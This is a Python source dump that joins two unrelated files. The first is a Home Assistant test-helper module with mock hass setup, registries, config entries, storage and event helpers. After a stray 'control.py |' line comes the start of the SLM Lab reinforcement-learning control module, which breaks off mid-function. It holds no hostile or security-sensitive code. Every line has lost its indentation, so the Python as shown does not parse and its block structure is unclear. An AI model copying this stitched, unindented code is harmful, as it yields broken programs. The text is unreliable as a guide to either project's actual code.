"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)
).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return asyncio.run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop
).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), "testing_config", *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
hass = loop.run_until_complete(async_test_home_assistant(loop))
loop_stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
loop_stop_event.set()
orig_stop = hass.stop
hass._stopped = Mock(set=loop.stop)
def start_hass(*mocks):
"""Start hass."""
asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
loop_stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
async def async_test_home_assistant(loop, load_registries=True):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant()
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock) and not isinstance(target, AsyncMock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock) and not isinstance(coroutine, AsyncMock):
fut = asyncio.Future()
fut.set_result(None)
return fut
return orig_async_create_task(coroutine)
async def async_wait_for_task_count(self, max_remaining_tasks: int = 0) -> None:
"""Block until at most max_remaining_tasks remain.
Based on HomeAssistant.async_block_till_done
"""
# To flush out any call_soon_threadsafe
await asyncio.sleep(0)
start_time: float | None = None
while len(self._pending_tasks) > max_remaining_tasks:
pending: Collection[Awaitable[Any]] = [
task for task in self._pending_tasks if not task.done()
]
self._pending_tasks.clear()
if len(pending) > max_remaining_tasks:
remaining_pending = await self._await_count_and_log_pending(
pending, max_remaining_tasks=max_remaining_tasks
)
self._pending_tasks.extend(remaining_pending)
if start_time is None:
# Avoid calling monotonic() until we know
# we may need to start logging blocked tasks.
start_time = 0
elif start_time == 0:
# If we have waited twice then we set the start
# time
start_time = monotonic()
elif monotonic() - start_time > BLOCK_LOG_TIMEOUT:
# We have waited at least three loops and new tasks
# continue to block. At this point we start
# logging all waiting tasks.
for task in pending:
_LOGGER.debug("Waiting for task: %s", task)
else:
self._pending_tasks.extend(pending)
await asyncio.sleep(0)
async def _await_count_and_log_pending(
self, pending: Collection[Awaitable[Any]], max_remaining_tasks: int = 0
) -> Collection[Awaitable[Any]]:
"""Block at most max_remaining_tasks remain and log tasks that take a long time.
Based on HomeAssistant._await_and_log_pending
"""
wait_time = 0
return_when = asyncio.ALL_COMPLETED
if max_remaining_tasks:
return_when = asyncio.FIRST_COMPLETED
while len(pending) > max_remaining_tasks:
_, pending = await asyncio.wait(
pending, timeout=BLOCK_LOG_TIMEOUT, return_when=return_when
)
if not pending or max_remaining_tasks:
return pending
wait_time += BLOCK_LOG_TIMEOUT
for task in pending:
_LOGGER.debug("Waited %s seconds for task: %s", wait_time, task)
return []
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.async_wait_for_task_count = types.MethodType(async_wait_for_task_count, hass)
hass._await_count_and_log_pending = types.MethodType(
_await_count_and_log_pending, hass
)
hass.data[loader.DATA_CUSTOM_COMPONENTS] = {}
hass.config.location_name = "test home"
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone("US/Pacific")
hass.config.units = METRIC_SYSTEM
hass.config.media_dirs = {"local": get_test_config_dir("media")}
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = {}
hass.config_entries._store._async_ensure_stop_listener = lambda: None
# Load the registries
if load_registries:
await asyncio.gather(
device_registry.async_load(hass),
entity_registry.async_load(hass),
area_registry.async_load(hass),
)
await hass.async_block_till_done()
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
async def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch("homeassistant.core._async_create_timer"), patch.object(
hass, "async_stop_track_tasks"
):
await orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
async def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode("utf-8")
msg = Message(topic, payload, qos, retain)
hass.data["mqtt"]._mqtt_handle_message(msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, datetime_, fire_all=False):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {"now": date_util.as_utc(datetime_)})
for task in list(hass.loop._scheduled):
if not isinstance(task, asyncio.TimerHandle):
continue
if task.cancelled():
continue
mock_seconds_into_future = datetime_.timestamp() - time.time()
future_seconds = task.when() - hass.loop.time()
if fire_all or mock_seconds_into_future >= future_seconds:
with patch(
"homeassistant.helpers.event.time_tracker_utcnow",
return_value=date_util.as_utc(datetime_),
):
task._run()
task.cancel()
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), "fixtures", filename)
with open(path, encoding="utf-8") as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {"entity_id": new_state.entity_id, "new_state": new_state}
if old_state:
event_data["old_state"] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError(f"Integration {component} is already setup")
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or OrderedDict()
registry._rebuild_index()
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
def mock_area_registry(hass, mock_entries=None):
"""Mock the Area Registry."""
registry = area_registry.AreaRegistry(hass)
registry.areas = mock_entries or OrderedDict()
hass.data[area_registry.DATA_REGISTRY] = registry
return registry
def mock_device_registry(hass, mock_entries=None, mock_deleted_entries=None):
"""Mock the Device Registry."""
registry = device_registry.DeviceRegistry(hass)
registry.devices = mock_entries or OrderedDict()
registry.deleted_devices = mock_deleted_entries or OrderedDict()
registry._rebuild_index()
hass.data[device_registry.DATA_REGISTRY] = registry
return registry
class MockGroup(auth_models.Group):
"""Mock a group in Home Assistant."""
def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY):
"""Mock a group."""
kwargs = {"name": name, "policy": policy}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._groups[self.id] = self
return self
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(
self,
id=None,
is_owner=False,
is_active=True,
name="Mock User",
system_generated=False,
groups=None,
):
"""Initialize mock user."""
kwargs = {
"is_owner": is_owner,
"is_active": is_active,
"name": name,
"system_generated": system_generated,
"groups": groups or [],
"perm_lookup": None,
}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
def mock_policy(self, policy):
"""Mock a policy for a user."""
self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup)
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config
)
assert provider is not None, "Invalid config specified"
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError("Provider already registered")
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._set_defaults()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(
self,
domain=None,
dependencies=None,
setup=None,
requirements=None,
config_schema=None,
platform_schema=None,
platform_schema_base=None,
async_setup=None,
async_setup_entry=None,
async_unload_entry=None,
async_migrate_entry=None,
async_remove_entry=None,
partial_manifest=None,
):
"""Initialize the mock module."""
self.__name__ = f"homeassistant.components.{domain}"
self.__file__ = f"homeassistant/components/{domain}"
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
# Overlay to be used when generating manifest from this module
self._partial_manifest = partial_manifest
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if platform_schema_base is not None:
self.PLATFORM_SCHEMA_BASE = platform_schema_base
if setup:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = AsyncMock(return_value=True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
if async_migrate_entry is not None:
self.async_migrate_entry = async_migrate_entry
if async_remove_entry is not None:
self.async_remove_entry = async_remove_entry
def mock_manifest(self):
"""Generate a mock manifest to represent this module."""
return {
**loader.manifest_from_legacy_module(self.DOMAIN, self),
**(self._partial_manifest or {}),
}
class MockPlatform:
"""Provide a fake platform."""
__name__ = "homeassistant.components.light.bla"
__file__ = "homeassistant/components/blah/light"
# pylint: disable=invalid-name
def __init__(
self,
setup_platform=None,
dependencies=None,
platform_schema=None,
async_setup_platform=None,
async_setup_entry=None,
scan_interval=None,
):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = AsyncMock(return_value=None)
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self,
hass,
logger=None,
domain="test_domain",
platform_name="test_platform",
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger("homeassistant.helpers.entity_platform")
# Otherwise the constructor will blow up.
if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
)
class MockToggleEntity(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state, unique_id=None):
"""Initialize the mock entity."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the entity if any."""
self.calls.append(("name", {}))
return self._name
@property
def state(self):
"""Return the state of the entity if any."""
self.calls.append(("state", {}))
return self._state
@property
def is_on(self):
"""Return true if entity is on."""
self.calls.append(("is_on", {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the entity on."""
self.calls.append(("turn_on", kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the entity off."""
self.calls.append(("turn_off", kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls) if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(
self,
*,
domain="test",
data=None,
version=1,
entry_id=None,
source=config_entries.SOURCE_USER,
title="Mock Title",
state=None,
options={},
system_options={},
connection_class=config_entries.CONN_CLASS_UNKNOWN,
unique_id=None,
disabled_by=None,
):
"""Initialize a mock config entry."""
kwargs = {
"entry_id": entry_id or uuid_util.random_uuid_hex(),
"domain": domain,
"data": data or {},
"system_options": system_options,
"options": options,
"version": version,
"title": title,
"connection_class": connection_class,
"unique_id": unique_id,
"disabled_by": disabled_by,
}
if source is not None:
kwargs["source"] = source
if state is not None:
kwargs["state"] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries[self.entry_id] = self
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries[self.entry_id] = self
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(files_dict.keys(), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if isinstance(fname, pathlib.Path):
fname = str(fname)
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, "name", fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, "name", fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if "homeassistant/components" in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding="utf-8")
# Not found
raise FileNotFoundError(f"File not found: {fname}")
return patch.object(yaml_loader, "open", mock_open_f, create=True)
def mock_coro(return_value=None, exception=None):
"""Return a coro that returns a value or raise an exception."""
fut = asyncio.Future()
if exception is not None:
fut.set_exception(exception)
else:
fut.set_result(return_value)
return fut
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The amount of valid platforms that should be setup
- domain: The domain to count is optional. It can be automatically
determined most of the time
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
async def mock_psc(hass, config_input, integration):
"""Mock the prepare_setup_component to capture config."""
domain_input = integration.domain
res = await async_process_component_config(hass, config_input, integration)
config[domain_input] = None if res is None else res.get(domain_input)
_LOGGER.debug(
"Configuration for %s, Validated: %s, Original %s",
domain_input,
config[domain_input],
config_input.get(domain_input),
)
return res
assert isinstance(config, dict)
with patch("homeassistant.config.async_process_component_config", mock_psc):
yield config
if domain is None:
assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format(
list(config.keys())
)
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert (
res_len == count
), f"setup_component failed, expected {count} got {res_len}: {res}"
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = "sqlite://" # In memory DB
with patch("homeassistant.components.recorder.migration.migrate_schema"):
assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
async def async_init_recorder_component(hass, add_config=None):
"""Initialize the recorder asynchronously."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = "sqlite://"
with patch("homeassistant.components.recorder.migration.migrate_schema"):
assert await async_setup_component(
hass, recorder.DOMAIN, {recorder.DOMAIN: config}
)
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_STATE_TASK
data = restore_state.RestoreStateData(hass)
now = date_util.utcnow()
last_states = {}
for state in states:
restored_state = state.as_dict()
restored_state["attributes"] = json.loads(
json.dumps(restored_state["attributes"], cls=JSONEncoder)
)
last_states[state.entity_id] = restore_state.StoredState(
State.from_dict(restored_state), now
)
data.last_states = last_states
_LOGGER.debug("Restore cache: %s", data.last_states)
assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}"
hass.data[key] = data
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if "entity_id" in values:
self.entity_id = values["entity_id"]
@property
def name(self):
"""Return the name of the entity."""
return self._handle("name")
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle("should_poll")
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle("unique_id")
@property
def state(self):
"""Return the state of the entity."""
return self._handle("state")
@property
def available(self):
"""Return True if entity is available."""
return self._handle("available")
@property
def device_info(self):
"""Info how it links to a device."""
return self._handle("device_info")
@property
def device_class(self):
"""Info how device should be classified."""
return self._handle("device_class")
@property
def unit_of_measurement(self):
"""Info on the units the entity state is in."""
return self._handle("unit_of_measurement")
@property
def capability_attributes(self):
"""Info about capabilities."""
return self._handle("capability_attributes")
@property
def supported_features(self):
"""Info about supported features."""
return self._handle("supported_features")
@property
def entity_registry_enabled_default(self):
"""Return if the entity should be enabled when first added to the entity registry."""
return self._handle("entity_registry_enabled_default")
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if "data" not in mock_data or "version" not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info("Loading data for %s: %s", store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
_LOGGER.info("Writing data to %s: %s", store.key, data_to_write)
# To ensure that the data can be serialized
data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder))
async def mock_remove(store):
"""Remove data."""
data.pop(store.key, None)
with patch(
"homeassistant.helpers.storage.Store._async_load",
side_effect=mock_async_load,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store._write_data",
side_effect=mock_write_data,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store.async_remove",
side_effect=mock_remove,
autospec=True,
):
yield data
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
store._async_cleanup_final_write_listener()
store._async_cleanup_delay_listener()
await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
"""Get system health info."""
return await hass.data["system_health"][domain].info_callback(hass)
def mock_integration(hass, module, built_in=True):
"""Mock an integration."""
integration = loader.Integration(
hass,
f"{loader.PACKAGE_BUILTIN}.{module.DOMAIN}"
if built_in
else f"{loader.PACKAGE_CUSTOM_COMPONENTS}.{module.DOMAIN}",
None,
module.mock_manifest(),
)
def mock_import_platform(platform_name):
raise ImportError(
f"Mocked unable to import platform '{platform_name}'",
name=f"{integration.pkg_path}.{platform_name}",
)
integration._import_platform = mock_import_platform
_LOGGER.info("Adding mock integration: %s", module.DOMAIN)
hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration
hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module
return integration
def mock_entity_platform(hass, platform_path, module):
"""Mock a entity platform.
platform_path is in form light.hue. Will create platform
hue.light.
"""
domain, platform_name = platform_path.split(".")
mock_platform(hass, f"{platform_name}.{domain}", module)
def mock_platform(hass, platform_path, module=None):
"""Mock a platform.
platform_path is in form hue.config_flow.
"""
domain, platform_name = platform_path.split(".")
integration_cache = hass.data.setdefault(loader.DATA_INTEGRATIONS, {})
module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})
if domain not in integration_cache:
mock_integration(hass, MockModule(domain))
_LOGGER.info("Adding mock integration platform: %s", platform_path)
module_cache[platform_path] = module or Mock()
def async_capture_events(hass, event_name):
"""Create a helper that captures events."""
events = []
@ha.callback
def capture_events(event):
events.append(event)
hass.bus.async_listen(event_name, capture_events)
return events
@ha.callback
def async_mock_signal(hass, signal):
"""Catch all dispatches to a signal."""
calls = []
@ha.callback
def mock_signal_handler(*args):
"""Mock service call."""
calls.append(args)
hass.helpers.dispatcher.async_dispatcher_connect(signal, mock_signal_handler)
return calls
class hashdict(dict):
"""
hashable dict implementation, suitable for use as a key into other dicts.
>>> h1 = hashdict({"apples": 1, "bananas":2})
>>> h2 = hashdict({"bananas": 3, "mangoes": 5})
>>> h1+h2
hashdict(apples=1, bananas=3, mangoes=5)
>>> d1 = {}
>>> d1[h1] = "salad"
>>> d1[h1]
'salad'
>>> d1[h2]
Traceback (most recent call last):
...
KeyError: hashdict(bananas=3, mangoes=5)
based on answers from
http://stackoverflow.com/questions/1151658/python-hashable-dicts
"""
def __key(self):
return tuple(sorted(self.items()))
def __repr__(self): # noqa: D105 no docstring
return ", ".join(f"{i[0]!s}={i[1]!r}" for i in self.__key())
def __hash__(self): # noqa: D105 no docstring
return hash(self.__key())
def __setitem__(self, key, value): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def __delitem__(self, key): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def clear(self): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def pop(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def popitem(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def setdefault(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def update(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
# update is not ok because it mutates the object
# __add__ is ok because it creates a new object
# while the new object is under construction, it's ok to mutate it
def __add__(self, right): # noqa: D105 no docstring
result = hashdict(self)
dict.update(result, right)
return result
def assert_lists_same(a, b):
"""Compare two lists, ignoring order."""
assert collections.Counter([hashdict(i) for i in a]) == collections.Counter(
[hashdict(i) for i in b]
)
|
control.py | '''
The control module
Creates and controls the units of SLM lab: Experiment, Trial, Session
'''
from copy import deepcopy
from importlib import reload
from slm_lab.agent import AgentSpace, Agent
from slm_lab.env import EnvSpace, make_env
from slm_lab.experiment import analysis, search
from slm_lab.experiment.monitor import AEBSpace, Body, enable_aeb_space
from slm_lab.lib import logger, util
from slm_lab.spec import spec_util
import os
import torch.multiprocessing as mp
class Session:
'''
The base unit of instantiated RL system.
Given a spec,
session creates agent(s) and environment(s),
run the RL system and collect data, e.g. fitness metrics, till it ends,
then return the session data.
'''
def __init__(self, spec, info_space, global_nets=None):
self.spec = spec
self.info_space = info_space
self.index = self.info_space.get('session')
util.set_logger(self.spec, self.info_space, logger, 'session')
self.data = None
self.eval_proc = None # reference run_online_eval process
# init singleton agent and env
self.env = make_env(self.spec)
body = Body(self.env, self.spec['agent'])
util.set_rand_seed(self.info_space.get_random_seed(), self.env)
util.try_set_cuda_id(self.spec, self.info_space)
self.agent = Agent(self.spec, self.info_space, body=body, global_nets=global_nets)
enable_aeb_space(self) # to use lab's data analysis framework
logger.info(util.self_desc(self))
logger.info(f'Initialized session {self.index}')
def try_ckpt(self, agent, env):
'''Try to checkpoint agent and run_online_eval at the start, save_freq, and the end'''
clock = env.clock
tick = clock.get(env.max_tick_unit)
to_ckpt = False
if util.get_lab_mode() not in ('enjoy', 'eval') and tick <= env.max_tick:
to_ckpt = (tick % env.save_frequency == 0) or tick == env.max_tick
if env.max_tick_unit == 'epi': # extra condition for epi
to_ckpt = to_ckpt and env.done
if to_ckpt:
if analysis.new_best(agent):
agent.save(ckpt='best')
# run online eval for train mode
if util.get_lab_mode() == 'train' and self.spec['meta'].get('training_eval', False):
ckpt = f'epi{clock.epi}-totalt{clock.total_t}'
agent.save(ckpt=ckpt)
# set reference to eval process for handling
self.eval_proc = analysis.run_online_eval(self.spec, self.info_space, ckpt)
if tick > 0: # nothing to analyze at start
analysis.analyze_session(self)
def run_episode(self):
self.env.clock.tick('epi')
logger.info(f'Running trial {self.info_space.get("trial")} session {self.index} episode {self.env.clock.epi}')
reward, state, done = self.env.reset()
self.agent.reset(state)
while not done:
self.try_ckpt(self.agent, self.env)
self.env.clock.tick('t')
action = self.agent.act(state)
reward, state, done = self.env.step(action)
self.agent.update(action, reward, state, done)
self.try_ckpt(self.agent, self.env) # final timestep ckpt
self.agent.body.log_summary()
def close(self):
'''
Close session and clean up.
Save agent, close env.
'''
self.agent.close()
self.env.close()
logger.info('Session done and closed.')
def run(self):
while self.env.clock.get(self.env.max_tick_unit) < self.env.max_tick:
self.run_episode()
if util.get_lab_mode() not in ('enjoy', 'eval') and analysis.all_solved(self.agent):
logger.info('All environments solved. Early exit.')
break
if self.eval_proc is not None: # wait for final eval before closing
util.run_cmd_wait(self.eval_proc)
self.data = analysis.analyze_session(self) # session fitness
self.close()
return self.data
class SpaceSession(Session):
'''Session for multi-agent/env setting'''
def __init__(self, spec, info_space, global_nets=None):
self.spec = spec
self.info_space = info_space
self.index = self.info_space.get('session')
util.set_logger(self.spec, self.info_space, logger, 'session')
self.data = None
self.eval_proc = None # reference run_online_eval process
self.aeb_space = AEBSpace(self.spec, self.info_space)
self.env_space = EnvSpace(self.spec, self.aeb_space)
self.aeb_space.init_body_space()
util.set_rand_seed(self.info_space.get_random_seed(), self.env_space)
util.try_set_cuda_id(self.spec, self.info_space)
self.agent_space = AgentSpace(self.spec, self.aeb_space, global_nets)
logger.info(util.self_desc(self))
logger.info(f'Initialized session {self.index}')
def try_ckpt(self, agent_space, env_space):
'''Try to checkpoint agent and run_online_eval at the start, save_freq, and the end'''
for agent in agent_space.agents:
for body in agent.nanflat_body_a:
env = body.env
super(SpaceSession, self).try_ckpt(agent, env)
def run_all_episodes(self):
'''
Continually run all episodes, where each env can step and reset at its own clock_speed and timeline.
Will terminate when all envs done are done.
'''
all_done = self.aeb_space.tick('epi')
reward_space, state_space, done_space = self.env_space.reset()
self.agent_space.reset(state_space)
while not all_done:
self.try_ckpt(self.agent_space, self.env_space)
all_done = self.aeb_space.tick()
action_space = self.agent_space.act(state_space)
reward_space, state_space, done_space = self.env_space.step(action_space)
self.agent_space.update(action_space, reward_space, state_space, done_space)
self.try_ckpt(self.agent_space, self.env_space)
if self.eval_proc is not None: # wait for final eval before closing
util.run_cmd_wait(self.eval_proc)
def close(self):
'''
Close session and clean up.
Save agent, close env.
'''
self.agent_space.close()
self.env_space.close()
logger.info('Session done and closed.')
def run(self):
self.run_all_episodes()
self.data = analysis.analyze_session(self) # session fitness
self.close()
return self.data
def init_run_session(*args):
'''Runner for multiprocessing'''
session = Session(*args)
return session.run()
def init_run_space_session(*args):
'''Runner for multiprocessing'''
session = SpaceSession(*args)
return session.run()
class Trial:
'''
The base unit of an experiment.
Given a spec and number s,
trial creates and runs s sessions,
gather and aggregate data from sessions as trial data,
then return the trial data.
'''
def __init__(self, spec, info_space):
self.spec = spec
self.info_space = info_space
self.index = self.info_space.get('trial')
info_space.set('session', None) # Session starts anew for new trial
util.set_logger(self.spec, self.info_space, logger, 'trial')
self.session_data_dict = {}
self.data = None
analysis.save_spec(spec, info_space, unit='trial')
self.is_singleton = spec_util.is_singleton(spec) # singleton mode as opposed to multi-agent-env space
self.SessionClass = Session if self.is_singleton else SpaceSession
self.mp_runner = init_run_session if self.is_singleton else init_run_space_session
logger.info(f'Initialized trial {self.index}')
def parallelize_sessions(self, global_nets=None):
workers = []
for _s in range(self.spec['meta']['max_session']):
self.info_space.tick('session')
